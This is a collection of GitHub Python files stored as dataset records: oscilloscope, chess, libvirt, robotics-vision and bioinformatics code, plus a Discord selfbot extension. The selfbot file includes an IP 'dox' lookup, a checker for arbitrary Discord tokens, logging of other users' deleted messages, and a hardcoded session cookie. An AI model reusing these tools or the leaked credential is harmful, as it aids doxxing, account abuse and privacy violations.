file\npdf.output(\"output.pdf\")","repo_name":"asieduofeijnr/Pdf_Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9935301591","text":"from vues.affichage_modification_classement import *\nfrom controleurs.outils_controleurs import OutilsControleurs\nfrom os import system as sys\nfrom tinydb import TinyDB, Query\n\n\nclass ModificationClassement:\n \"\"\"\n Classe servant a modifier le classement d'un joueur.\n type d'arguments : dict\n \"\"\"\n\n def __init__(self, nom_joueurs_classement):\n self.nom_joueurs_classement = nom_joueurs_classement\n\n def modification_classement_tounoi(self):\n \"\"\"\n Methode modifiant le classement des joueurs d'un tournoi fini.\n \"\"\"\n x = len(self.nom_joueurs_classement)\n a = 1\n list_nom = []\n while a <= x:\n reponse = 0\n while reponse == 0 or reponse > x:\n try:\n sys(OutilsControleurs.which_os())\n z = 1\n for arg in self.nom_joueurs_classement:\n if arg not in list_nom:\n print(nom_disponible(z, arg))\n z += 1\n reponse = int(input(input_choix_joueur()))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n sys(OutilsControleurs.which_os())\n continue\n nom_joueur = \"\"\n e = 1\n for nom, classement in self.nom_joueurs_classement:\n if e == reponse:\n nom_joueur = nom\n e += 1\n e = 1\n for arg in self.nom_joueurs_classement:\n if e == reponse:\n list_nom.append(arg)\n e += 1\n reponse_2 = 0\n while reponse_2 == 0 or reponse_2 > x:\n try:\n reponse_2 = int(input(input_choix_classement(nom_joueur)))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n continue\n nom_joueur = nom_joueur.split(\" \")\n a += 1\n db_file = 'data/joueurs.json'\n db = TinyDB(db_file)\n db = db.table(\"Joueur\")\n db.all()\n nom_joueur_db = Query()\n db.update({\"classement\": reponse_2}, nom_joueur_db.nom == nom_joueur[0])\n\n def modification_classement(self):\n \"\"\"\n Methode modifiant le classement d'un joueur en dehors d'une fin de tournoi.\n \"\"\"\n z = len(self.nom_joueurs_classement) + 1\n reponse = 0\n while reponse != z:\n reponse = 0\n while reponse == 0 or reponse > z:\n try:\n sys(OutilsControleurs.which_os())\n x = 1\n for arg in self.nom_joueurs_classement:\n arg = str(arg).replace(\"\\n\", \"\")\n print(nom_disponible(x, arg))\n x += 1\n print(retour(x))\n reponse = int(input(input_choix_joueur()))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n sys(OutilsControleurs.which_os())\n continue\n if reponse == z:\n return\n nom_joueur = \"\"\n e = 1\n for nom in self.nom_joueurs_classement:\n if e == reponse:\n nom = str(nom).replace(\"\\n\", \"\")\n nom_joueur = nom\n e += 1\n reponse_2 = 0\n while reponse_2 == 0 or reponse_2 > x:\n try:\n reponse_2 = int(input(input_choix_classement(nom_joueur)))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n continue\n nom_joueur = nom_joueur.split(\" \")\n db_file = 'data/joueurs.json'\n db = TinyDB(db_file)\n db = db.table(\"Joueur\")\n db.all()\n nom_joueur_db = Query()\n db.update({\"classement\": reponse_2}, nom_joueur_db.nom == nom_joueur[0])\n","repo_name":"ChevallierQ/P4_01_tournois_echecs_fini","sub_path":"controleurs/modification_classement.py","file_name":"modification_classement.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436028359","text":"import logging as log\n\nfrom avocado.utils import process\nfrom avocado.utils import astring\n\nfrom virttest import libvirt_xml\nfrom virttest import virsh\nfrom virttest.libvirt_xml.devices import interface\nfrom virttest.utils_test import libvirt as utlv\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef run(test, params, env):\n \"\"\"\n Test if domain destroy with nwfilter will\n produce error messege in libvirt.log\n\n 1) set env\n 2) run command and check result\n 3) clean env\n \"\"\"\n\n vm_name = params.get(\"main_vm\")\n vm = env.get_vm(vm_name)\n status_error = \"yes\" == params.get(\"status_error\")\n vmxml_backup = libvirt_xml.vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n filter_name = params.get(\"filter_name\")\n check_cmd = params.get(\"check_cmd\")\n\n def set_env():\n vmxml = libvirt_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n iface_xml = vmxml.get_devices('interface')[0]\n vmxml.del_device(iface_xml)\n new_iface = interface.Interface('network')\n new_iface.xml = iface_xml.xml\n new_iface.type_name = \"network\"\n new_iface.source = {'network': \"default\"}\n filter_dict = {}\n filter_dict['name'] = filter_name\n filter_dict['parameters'] = []\n new_iface.filterref = new_iface.new_filterref(**filter_dict)\n logging.debug(\"new iface is %s\" % new_iface)\n vmxml.add_device(new_iface)\n vmxml.sync()\n\n try:\n # set env\n set_env()\n # start vm\n ret = virsh.start(vm_name, debug=True)\n utlv.check_exit_status(ret, status_error)\n # destroy vm see if libvirtd.log will get error\n virsh.destroy(vm_name)\n utlv.check_exit_status(ret, status_error)\n out = astring.to_text(process.system_output(\n check_cmd, ignore_status=True, shell=True))\n if out:\n test.fail(\"libvirtd.log get error\")\n\n finally:\n if vm.is_alive():\n vm.destroy(gracefully=False)\n vmxml_backup.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/nwfilter/vm_destroy_with_nwfilter.py","file_name":"vm_destroy_with_nwfilter.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"28481417750","text":"import sys\nimport re\n\ndef main():\n with open(sys.argv[1],'r') as f:\n for line in f:\n cigar = line.split('\\t')[5]\n x = re.search('M',cigar)\n y = re.findall(\"[0-9]+\",cigar[:x.start()])\n print(y[-1])\n f.close()\n\nif __name__ == '__main__':\n main()","repo_name":"baolab-rice/LongAmpseq","sub_path":"temp/Match_checking.py","file_name":"Match_checking.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"28020779460","text":"import json, time, sys, cscore, numpy, pixy, cv2\nfrom cscore import CameraServer, VideoSource, UsbCamera, MjpegServer, CvSource\nfrom networktables import NetworkTablesInstance, NetworkTables\n\n#-------------------------------------------------------------------------------------\n\n#____________/\\\\\\______/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\______/\\\\\\\\\\\\\\_______________/\\\\\\____\n# __________/\\\\\\\\\\_____\\/\\\\\\///////////_____/\\\\\\/////\\\\\\___________/\\\\\\\\\\____\n# ________/\\\\\\/\\\\\\_____\\/\\\\\\_______________/\\\\\\____\\//\\\\\\________/\\\\\\/\\\\\\____\n# ______/\\\\\\/\\/\\\\\\_____\\/\\\\\\\\\\\\\\\\\\\\\\\\_____\\/\\\\\\_____\\/\\\\\\______/\\\\\\/\\/\\\\\\____\n# ____/\\\\\\/__\\/\\\\\\_____\\////////////\\\\\\___\\/\\\\\\_____\\/\\\\\\____/\\\\\\/__\\/\\\\\\____\n# __/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_____________\\//\\\\\\__\\/\\\\\\_____\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_\n# _\\///////////\\\\\\//___/\\\\\\________\\/\\\\\\__\\//\\\\\\____/\\\\\\__\\///////////\\\\\\//__\n# ___________\\/\\\\\\____\\//\\\\\\\\\\\\\\\\\\\\\\\\\\/____\\///\\\\\\\\\\\\\\/_____________\\/\\\\\\____\n# ___________\\///______\\/////////////________\\///////_______________\\///_____\n# Welcome to Team 4504's offboard vision code the raspberry pi.\n\n# Contributors:\n# porgull/Connor Barker\n\n#-------------------------------------------------------------------------------------\n\n# JSON format:\n# {\n# \"team\": ,\n# \"ntmode\": <\"client\" or \"server\", \"client\" if unspecified>\n# \"cameras\": [\n# {\n# \"name\": \n# \"path\": \n# \"pixel format\": <\"MJPEG\", \"YUYV\", etc> // optional\n# \"width\": // optional\n# \"height\": // optional\n# \"fps\": // optional\n# \"brightness\": // optional\n# \"white balance\": <\"auto\", \"hold\", value> // optional\n# \"exposure\": <\"auto\", \"hold\", value> // optional\n# \"pixy\": \n# \"stream\": { // optional\n# \"properties\": [\n# {\n# \"name\": \n# \"value\": \n# }\n# ]\n# }\n# }\n# ]\n# }\n\n#-------------------------------------------------------------------------------------\n\n# MOST CODE IS UNEDITED FROM THE EXAMPLE:\n\nconfigFile = \"/boot/frc.json\"\n\nclass CameraConfig: pass\n\nteam = 4504\nserver = False\ncameraConfigs = []\npixy_source = None\nvectors = pixy.VectorArray(1)\n\n\n\"\"\"Report parse error.\"\"\"\ndef parseError(str):\n print(\"config error in '\" + configFile + \"': \" + str, file=sys.stderr)\n\n\"\"\"Read single camera configuration.\"\"\"\ndef readCameraConfig(config):\n cam = CameraConfig()\n\n # name\n try:\n cam.name = config[\"name\"]\n except KeyError:\n parseError(\"could not read camera name\")\n return False\n\n # path\n try:\n cam.path = config[\"path\"]\n except KeyError:\n parseError(\"camera '{}': could not read path\".format(cam.name))\n return False\n\n\n #ADDED CODE: add pixy as a camera property\n try:\n cam.pixy = config[\"pixy\"]\n except KeyError:\n parseError(\"camera '{}': could not read pixy\".format(came.name))\n\n # stream properties\n cam.streamConfig = config.get(\"stream\")\n\n cam.config = config\n\n cameraConfigs.append(cam)\n return True\n\n\"\"\"Read configuration file.\"\"\"\ndef readConfig():\n global team\n global server\n\n # parse file\n try:\n with open(configFile, \"rt\") as f:\n j = json.load(f)\n except OSError as err:\n print(\"could not open '{}': {}\".format(configFile, err), file=sys.stderr)\n return False\n\n # top level must be an object\n if not isinstance(j, dict):\n parseError(\"must be JSON object\")\n return False\n\n # team number\n try:\n team = j[\"team\"]\n except KeyError:\n parseError(\"could not read team number\")\n return False\n\n # ntmode (optional)\n if \"ntmode\" in j:\n str = j[\"ntmode\"]\n if str.lower() == \"client\":\n server = False\n elif str.lower() == \"server\":\n server = True\n else:\n parseError(\"could not understand ntmode value '{}'\".format(str))\n\n # cameras\n try:\n cameras = j[\"cameras\"]\n except KeyError:\n parseError(\"could not read cameras\")\n return False\n for camera in cameras:\n if not readCameraConfig(camera):\n return False\n\n return True\n\n\"\"\"Start running the camera.\"\"\"\ndef startCamera(config):\n print(\"Starting camera '{}' on {}\".format(config.name, config.path))\n inst = CameraServer.getInstance()\n camera = None\n server = None\n\n\n #ADDED CODE: handle pixy camera capture by creating a cvsource, otherwise normal\n if config.pixy:\n #if the camera is a pixy, get a CvSource to put the generated images in\n global pixy_source\n pixy_source = inst.putVideo(\"Pixy\", 51, 51)\n else:\n #if the camera is not a pixy, automatically capture it\n camera = UsbCamera(config.name, config.path)\n server = inst.startAutomaticCapture(camera=camera, return_server=True)\n\n camera.setConfigJson(json.dumps(config.config))\n camera.setConnectionStrategy(VideoSource.ConnectionStrategy.kKeepOpen)\n\n if config.streamConfig is not None and config.pixy is False:\n server.setConfigJson(json.dumps(config.streamConfig))\n\n return camera\n\n#-------------------------------------------------------------------------------------\n#ADDED CODE: Initialize and generate pixy images\n\ndef initialize():\n #initiliaze the pixy in the module\n pixy.init()\n #ensure it is switched to detect the tape on the ground\n pixy.change_prog(\"line\")\n\ndef get_pixy_image():\n #get the vector and put it to the VectorArray\n pixy.line_get_all_features()\n pixy.line_get_vectors(1, vectors)\n\n #create a black image and add the line\n image = numpy.zeros((51, 51, 1), dtype=numpy.uint8)\n cv2.line(image, (vectors[0].m_y0,vectors[0].m_x0), (vectors[0].m_y1, vectors[0].m_x1), 256, thickness=5)\n return image\n\n#-------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n global pixy_sources\n if len(sys.argv) >= 2:\n configFile = sys.argv[1]\n\n # read configuration\n if not readConfig():\n sys.exit(1)\n\n # start NetworkTables\n ntinst = NetworkTablesInstance.getDefault()\n ntinst.startClientTeam(team)\n\n #ADDED: get the SmartDashboard to output to automatically\n #get the SmartDashboard table\n NetworkTables.initialize(server='roborio-4504-frc.local')\n sd = NetworkTables.getTable('SmartDashboard')\n W\n # start cameras\n cameras = []\n for cameraConfig in cameraConfigs:\n cameras.append(startCamera(cameraConfig))\n\n #initialize the pixy camera\n initialize()\n\n # loop forever\n while True:\n #ADDED CODE: in the loop, continually get and output values\n\n #create image from the pixy\n image = get_pixy_image()\n #put the created image to the cameraserver\n pixy_source.putFrame(image)\n\n #put useful values abt the vector the SmartDashboard\n #both for debug and for PID\n sd.putNumber(\"y0\",vectors[0].m_y0)\n sd.putNumber(\"x0\",vectors[0].m_x0)\n sd.putNumber(\"y1\",vectors[0].m_y1)\n sd.putNumber(\"x1\",vectors[0].m_x1)\n\n #compute the error for PID\n #error is the midpoint of the line's distance from\n #the center of the robot's motion\n sd.putNumber(\"error\", ((vectors[0].m_x0 + vectors[0].m_x1)/2) - 36)\n","repo_name":"BlountCountyRobotics/FRC2019-Vision","sub_path":"multiCameraServer.py","file_name":"multiCameraServer.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16908940974","text":"#!/usr/bin/python\n\nimport time\nimport socket\nimport argparse\nimport threading\nimport struct\nimport pyhantek\n\nclass SCPIServer:\n def __init__(self, bind_ip=\"localhost\", control_port=5025, waveform_port=5026):\n self.bind_ip = bind_ip\n self.control_port = control_port\n self.waveform_port = waveform_port\n self.hantek = pyhantek.Hantek()\n\n def open(self):\n print(f\"Opening Server {self.bind_ip}:c{self.control_port:d}:w{self.waveform_port:d}...\")\n self.control_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.control_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.control_sock.bind((self.bind_ip, self.control_port))\n self.control_sock.listen(1)\n\n self.waveform_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.waveform_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.waveform_sock.bind((self.bind_ip, self.waveform_port))\n self.waveform_sock.listen(1)\n\n def close(self):\n print(\"Closing Server...\")\n self.control_sock.close()\n del self.control_sock\n self.waveform_sock.close()\n del self.waveform_sock\n\n def _control_thread(self):\n while True:\n client, addr = self.control_sock.accept()\n #client.settimeout(1000)\n print(f\"Control: Connected with {addr[0]}:{str(addr[1])}\")\n in_buff = b\"\"\n while True:\n try:\n #data = client.recv(1024).decode(\"UTF-8\")\n data = client.makefile().readline()\n except Exception as e:\n print(e)\n print(\"Control: Disconnect\")\n client.close()\n if len(data) < 1:\n break\n\n cmd = data.split()\n multi_cmd = cmd[0].split(\":\")\n print(cmd, multi_cmd)\n\n # Get\n if \"IDN?\" in data:\n client.send(bytes(\"Hantek,Hantek6xx4B,0001,0.1\\n\", \"UTF-8\"))\n elif \"CHANS?\" in data:\n client.send(bytes(\"4\\n\", \"UTF-8\"))\n elif \"RATES?\" in data:\n rates = \",\".join(map(str,self.hantek.get_rates()))\n print(rates)\n client.send(bytes(rates+\"\\n\", \"UTF-8\"))\n elif \"DEPTHS?\" in data:\n client.send(bytes(\"4096\\n\", \"UTF-8\"))\n elif \"GAIN?\" in data:\n client.send(bytes(\"1\\n\", \"UTF-8\"))\n elif \"OFFS?\" in data:\n client.send(bytes(\"0\\n\", \"UTF-8\"))\n\n # Set\n elif \"RATE\" == cmd[0]:\n rate = int(cmd[1])\n self.hantek.set_rate(rate)\n\n elif len(multi_cmd) > 1:\n if multi_cmd[0] == \"TRIG\":\n if multi_cmd[1] == \"LEV\":\n level = float(cmd[1])\n print(\"setting trigger level\", level)\n self.hantek.set_trigger_level(level)\n else:\n client.send(b\"\")\n\n def _waveform_thread(self):\n while True:\n client, addr = self.waveform_sock.accept()\n print(f\"Waveform: Connected with {addr[0]}:{str(addr[1])}\")\n try:\n while True:\n data = self.hantek.read_buffer()\n rate = self.hantek.get_rate()\n fs_per_sample = int((10**15) / rate)\n # uint16_t numChannels; int64_t fs_per_sample;\n sample_hdr = struct.pack(\" None:\n self.bot: Bot = bot\n self.nitro_toggle: bool = False\n self.msg_toggle: bool = False\n self.inv_toggle: bool = False\n self.afk_message: bool | None = None\n self.timestamp: int = 0\n self.INVITE_REGEX = re.compile(\n r\"(http://|https://|)(discord.gg/|canary.discord.com/invite/|ptb.discord.com/invite/|discordapp.com/invite/|discord.com/invite/)[A-z]{3,20}\"\n )\n self.NITRO_REGEX = re.compile(\n r\"(http://|https://|)(discord.com/gifts/|discordapp.com/gifts/|discord.gift/|canary.discord.com/gifts/|ptb.discord.com/gifts)([a-zA-Z0-9]{5,18})\"\n )\n @Extender.cmd(\n description=\"Gather information regarding an IP address, IPv4 only\", aliases=['ipdox', 'geoip']\n )\n async def ipinfo(self, ctx: Context, ip: str):\n await ctx.message.delete()\n async with aiohttp.ClientSession() as session:\n async with session.get(f\"https://ipinfo.io/account/search?query={ip}\", headers={\n \"referer\":\"https://ipinfo.io/account/search\",\n \"connection\": \"keep-alive\",\n \"content-type\": \"application/json\",\n \"origin\": \"ipinfo.io\", \n \"user-agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0\",\n \"cookie\": \"flash=; stripe_mid=b86b556f-9fe0-4d16-a708-ba98416e86d55bcf15; jwt-express=eyJhbGciOiJFUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjo5NDEzNzcsImVtYWlsIjoiYW1pbi5kZXYwM0BnbWFpbC5jb20iLCJjcmVhdGVkIjoiYSBmZXcgc2Vjb25kcyBhZ28oMjAyMy0wNy0wNFQyMDozMTo0Mi4xNjRaKSIsInN0cmlwZV9pZCI6bnVsbCwiaWF0IjoxNjg4NTAyNzAyLCJleHAiOjE2OTEwOTQ3MDJ9.AMgurkX6peNX18MnUN7fK6TZFAZ7cuyurBoqprZaU_8s0g-QiAjhCkK-BqgpIVdmxOah4guAq7NUV1zGPWCZ1x47ACZrRYm32QZ-S7jMasi3WMsXT2a8mzG0GTrKQoE3lsvj5mg_AmlnxZYLhsACcFL0pWvMCiLTuAQ-CXS1ZMWId4eX; onboarding=0; stripe_sid=16f2b50b-95ca-4d76-b3b3-01440c54fe1e626512\"\n }) as resp:\n json = await resp.json()\n msg = TextEmbed().title(\"IP Geolocation\")\n for act_key, value in json.items():\n if act_key in ['asn', 'privacy', 'company', 'abuse', 'domains']:\n msg.subheading(act_key.capitalize())\n for key, value in json[act_key].items():\n msg.add_field(f\" {key}\", value)\n continue\n if act_key == \"tokenDetails\":\n msg.subheading(act_key.capitalize())\n for key, value in json[act_key].items():\n if key in ['hostio', 'core']:\n msg.add_field(f\" {key}\", value)\n continue\n msg.add_field(act_key, value)\n await ctx.send(msg, delete_after=60)\n @Extender.cmd(\n description=\"Gathers information regarding token\", aliases=[\"tdox\", \"tinfo\"]\n )\n async def tokeninfo(self, ctx: Context, _token: str):\n \"\"\"Gathers information regarding a token, works for both bot tokens and user tokens.\"\"\"\n await ctx.message.delete()\n data = await self.bot.http.request(\n \"get\", \"/users/@me\", headers={\"authorization\": f\"Bot {_token}\"}\n )\n if data is None:\n data = await self.bot.http.request(\n \"get\", \"/users/@me\", headers={\"authorization\": _token}\n )\n if data is not None:\n msg = TextEmbed().title(\"Token Information\")\n for key, value in data.items():\n msg.add_field(key, value)\n await ctx.send(msg, delete_after=60)\n else:\n await ctx.send(\"Token is Invalid!\", delete_after=60)\n\n @Extender.cmd(description=\"Toggles Nitro Sniper\", aliases=[\"nsnipe\", \"nsniper\"])\n async def nitrosniper(self, ctx: Context, toggle: str):\n \"\"\"Toggles the nitro sniper, the nitro sniper attempts to redeem any nitro gift code immediately as the gateway receives it. Information whether the redeeming of the gift was successful or not is displayed via the console.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.nitro_toggle = True\n await ctx.reply(\"**Nitro Sniper is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.nitro_toggle = False\n await ctx.reply(\"**Nitro Sniper is OFF**\", delete_after=60)\n\n @Extender.cmd(\n description=\"Toggles Message Logger\",\n aliases=[\"msgsniper\", \"msglogger\", \"msgsnipe\", \"msnipe\"],\n )\n async def messagesniper(self, ctx: Context, toggle: str):\n \"\"\"Toggles the message sniper, attempts to display deleted messages via the console, can only gather the full data of deleted messages after the bot starts running since they are cached, messages prior are not cached and therefore cannot be completely logged.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.msg_toggle = True\n await ctx.reply(\"**Message Logger is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.msg_toggle = False\n await ctx.reply(\"**Message Logger is OFF**\", delete_after=60)\n\n @Extender.cmd(\n description=\"Toggles Invite Logger\",\n aliases=[\"invlog\", \"invlogger\", \"ilog\", \"ilogger\"],\n )\n async def invitelogger(self, ctx: Context, toggle: str):\n \"\"\"Toggles the invite logger, attempts to display any/all invites posted in chat via the console.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.inv_toggle = True\n await ctx.reply(\"**Invite Logger is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.inv_toggle = False\n await ctx.reply(\"**Invite Logger is OFF**\", delete_after=60)\n\n @Extender.cmd(description=\"Purges all messages in chat\", aliases=[\"wipe\"])\n async def purge(self, ctx: Context, amount: int = 100):\n \"\"\"Purges all your own messages in the chat.\"\"\"\n await ctx.message.delete()\n await ctx.purge(amount)\n\n @Extender.cmd(description=\"Sets AFK status for user\")\n async def afk(self, ctx: Context, *, message: str):\n self.afk_message = message\n self.timestamp = int(time())\n await ctx.send(f\">>> # USER IS AFK\\n*{message}*\\n****\")\n\n @Extender.cmd(description=\"Snipes last send message\")\n async def snipe(self, ctx: Context):\n for message in reversed(self.bot.user.deleted_messages):\n if message.channel == ctx.channel:\n msg = TextEmbed().title(\"Sniped Message\").add_field(f\"{datetime.datetime.fromtimestamp(message.deleted_time).strftime('%H:%M:%S')} | {message.author.name}\", message.content)\n if len(message.attachments) > 0:\n for atch in message.attachments:\n msg += f\"{atch.proxy_url}\\n\"\n return await ctx.reply(msg, delete_after=60)\n\n @Extender.cmd(description=\"Create an invite for people to add you with\", aliases=['friend_invite', 'inv'])\n async def invite(self, ctx):\n await ctx.reply(f\"discord.gg/{(await self.bot.friend_invite())}\")\n\n @Extender.cmd(description=\"View current active invites\", aliases=['view_invites', 'view_invite', 'view_inv'])\n async def view_in(self, ctx):\n invites = await self.bot.view_invites()\n msg = TextEmbed().title(\"User Invites\")\n for inv in invites:\n for invite, expire in inv.items():\n msg.add_field(invite, expire)\n await ctx.reply(msg)\n \n @Extender.on(\"message_delete\")\n async def message_logger(self, message):\n if self.msg_toggle:\n if message.author != None:\n if message.author != self.bot.user:\n if message.guild != None:\n await aprint(\n f\"\"\"MESSAGE LOGGED:\nSERVER: {message.guild.name}\nCHANNEL: {message.channel.name}\nCONTENT:\n{message.author}: {message.content}\n \"\"\"\n )\n else:\n await aprint(\n f\"\"\"MESSAGE LOGGED:\nCHANNEL: {message.channel}\nCONTENT:\n{message.author}: {message.content}\n \"\"\"\n )\n\n @Extender.on(\"message\")\n async def invite_logger(self, message):\n if self.inv_toggle:\n matches = self.INVITE_REGEX.findall(message.content)\n if len(matches) > 0:\n if message.guild != None:\n await aprint(\n f\"\"\"Guild Invite Logged:\nSERVER: {message.guild.name}\nCHANNEL: {message.channel.name}\nINVITE: {matches}\n\n \"\"\"\n )\n else:\n await aprint(\n f\"\"\"Guild Invite Logged:\nCHANNEL: {message.channel.name}\nINVITE: {matches}\n \"\"\"\n )\n\n @Extender.on(\"message\")\n async def nitro_logger(self, message):\n if self.nitro_toggle:\n matches = self.NITRO_REGEX.findall(message.content)\n if len(matches) > 0:\n for match in matches:\n await self.bot.redeem_nitro(match[2])\n\n @Extender.on(\"message\")\n async def afk_checker(self, message: Message):\n if self.afk_message is not None:\n for user in message.mentions:\n if user == self.bot.user:\n await message.channel.reply(f\">>> # USER IS AFK\\n*{message}*\\n****\")\n if (message.author == self.bot.user) and (not self.afk_message in message.content):\n self.afk_message = None\n","repo_name":"Shell1010/Aeterna-Selfbot","sub_path":"data/exts/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":10114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"71727640221","text":"'''\n This script takes the hhsearch blasttab files result of comparing the OG profiles\n between them, and returns a unique file with three columns: query OG, hit OG and evalue.\n Notice that the name of the query OG in the files is the name of the first sequence\n in its alignment, so I have to pick the filename up, that contains the name of the OG\n'''\n\nimport glob\nimport argparse\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='')\n\n requiredArgs = parser.add_argument_group(\"Required Arguments\")\n\n requiredArgs.add_argument('-t', '--OG_blasttab_dir',\n dest='tab_dir',\n required=True,\n help='directory with the tables resulting from running hhsearch, '\n 'one profile vs the others'\n )\n requiredArgs.add_argument('-o', '--output_file',\n dest='out_file',\n required=True,\n help='file to store the 3 columns outfile usable by MCL'\n )\n\n return parser.parse_args()\n\n\ndef main():\n\n args = parse_args()\n\n tow = list()\n\n tables = glob.glob(f\"{args.tab_dir}/*.tab\")\n for table in tables:\n # remove all the tags from the file to retain only the OG_id\n query_OG = os.path.basename(table).split(\".tab\")[0]\n\n # read file\n # discard first line since it is the hit to itself\n lines = [line.strip().split(\"\\t\") for line in open(table).readlines()[1:]]\n for line in lines:\n if float(line[-2]) < 0.01:\n tow.append([query_OG, line[1], line[-2]])\n\n with open(args.out_file, \"w\") as fout:\n for hit in tow:\n fout.write(\"\\t\".join(hit) + \"\\n\")\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dcarrillouu/PhageAnnotation","sub_path":"scripts/broccoli/hhsearch_to_MCL.py","file_name":"hhsearch_to_MCL.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40214853493","text":"from movingAverage import movingAverage as MA\nimport numpy as np\nimport pandas as pd \nfrom datetime import datetime\nimport pandas_datareader as web\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom macd import MACD\nfrom AverageTrueRange import ADX\nfrom rsi import RSI\nfrom evolution import *\nfrom os import system\nfrom ProgressBar import printProgressBar\ndef getResult(sigClass,df,scaler):\n # Input the data frame\n sigClass.setDF( df)\n # Set the scaler(Could be any float)\n sigClass.setScalar(scaler)\n # Get the distance from the moving average\n sigClass.predict()\n # Return the MA\n return sigClass.getDF()\ndef getMAsig(df, window, scaler, key = \"mainMA\"):\n # Set up the moving average\n Average = MA(window,key)\n return getResult(Average,df,scaler)\n\ndef getMACDSig(df, short, long, scaler, key = \"mainMA\"):\n # Set up the moving average\n Average = MACD(key, short, long)\n return getResult(Average,df,scaler)\n\ndef getADXsig(df, key,scaler = 6):\n # Set up the Average true range; this generates buy/sell signals based on how STRONG a trend is \n Average = ADX(key, scaler)\n return getResult(Average,df,scaler)\n\ndef getRSIsig(df,key,scaler = 1):\n # Set up the moving average\n Average = RSI(key, scaler)\n return getResult(Average,df,scaler)\n\ndef plot(key, df, show = True, labelx = 'Distributions:'):\n df[key].plot(label=labelx)\n\n plt.legend(loc='best')\n plt.grid(True)\n plt.title('Positions')\n if(show):\n plt.show()\n\n\n\ndef getCombinedDF(minMA = 50,address = 'aba.nz'):\n keys = []\n key = \"mainMA\"\n df=web.DataReader(address, data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))\n MADist = getMAsig(df, minMA, 1, key)\n plot(key, MADist, show = False, labelx = 'MA')\n keys.append(key) \n key = \"MACD\"\n MACDsig = getMACDSig(df, 6,9,0.08,key)\n plot(key,MACDsig,show = False,labelx = 'MACD')\n keys.append(key)\n key = \"ADX\"\n ADXsig = getADXsig(df,key)\n plot(key,ADXsig,show = False, labelx = 'ADX')\n keys.append(key)\n key = \"RSI\"\n RSIsig = getRSIsig(df,key)\n plot(key,RSIsig,show = False, labelx = 'RSI')\n keys.append(key)\n # Reset the DF\n df=web.DataReader(address, data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))\n sigDF = MADist\n sigDF[\"MACD\"] = MACDsig\n sigDF[\"ADX\"]= ADXsig\n sigDF[\"RSI\"] = RSIsig \n sigDF[\"High\"] = df['High']\n sigDF[\"Low\"] = df['Low']\n sigDF[\"Volume\"] = df['Volume']\n sigDF[\"Open\"] = df['Open']\n # Remove invalid data points\n # Remember: Remove the initial values from the DF. if you have NAN numbers it will damage the AI\n sigDF = sigDF[minMA:]\n # print(sigDF)\n return (sigDF.to_numpy(),keys)\n\nclass sigGen:\n def __init__(self, df):\n self.df = df\n self.bool = True\n def onclick(self,event):\n if(self.bool):\n self.bool = False\n self.df.loc[matplotlib.dates.num2date(event.xdata)] = 1\n else:\n self.bool = True\n self.df.loc[matplotlib.dates.num2date(event.xdata)] = -1\n print('double' if event.dblclick else 'single', event.button,\n event.x, event.y, matplotlib.dates.num2date(event.xdata), event.ydata)\n def getDF(self):\n return self.df\n\nif __name__ == \"__main__\":\n minMA = 50\n data=web.DataReader('aba.nz', data_source = 'yahoo', start = '2012-01-01', end = datetime.today().strftime('%Y-%m-%d'))[\"Close\"][minMA:]\n template = data.apply(lambda a : 0)\n close = data.to_numpy()\n\n sigDF,keys = getCombinedDF(minMA)\n start = 1\n end = 100\n numGenerations = 50\n algo = evolver(num_inputs = len(keys) ,num_hidden = 100,pop_size = 100, template = template)\n printProgressBar(0, 